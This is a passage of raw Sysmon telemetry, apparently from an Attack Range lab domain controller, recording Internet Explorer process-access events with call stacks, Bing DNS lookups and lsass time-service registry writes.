Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:58.022{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:58.029{59A5CD1D-9410-6005-0E05-00000000A301}6584www.bing.com0type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 www-bing-com.dual-a-0001.a-msedge.net;type: 5 
dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:59.054{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:59.022{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:59.022{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:59.022{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet 
Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 22542200x800000000000000013527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:58.446{59A5CD1D-940F-6005-0C05-00000000A301}6476dofirefox9003-C:\Program Files\Internet Explorer\iexplore.exe 13241300x800000000000000013526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000013525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001709e3) 13241300x800000000000000013524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed99-0xb056d8e5) 13241300x800000000000000013523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda2-0x121b40e5) 13241300x800000000000000013522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edaa-0x73dfa8e5) 13241300x800000000000000013521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000013520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001709e3) 13241300x800000000000000013519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed99-0xb056d8e5) 13241300x800000000000000013518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda2-0x121b40e5) 13241300x800000000000000013517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:00.210{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6edaa-0x73dfa8e5) 22542200x800000000000000013528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:00.339{59A5CD1D-8E56-6005-2E00-00000000A301}2464200.21.107.13.in-addr.arpa.9003-C:\Windows\sysmon64.exe 
10341000x800000000000000013571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.507{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.491{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.491{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files 
(x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.491{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 
10341000x800000000000000013567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wo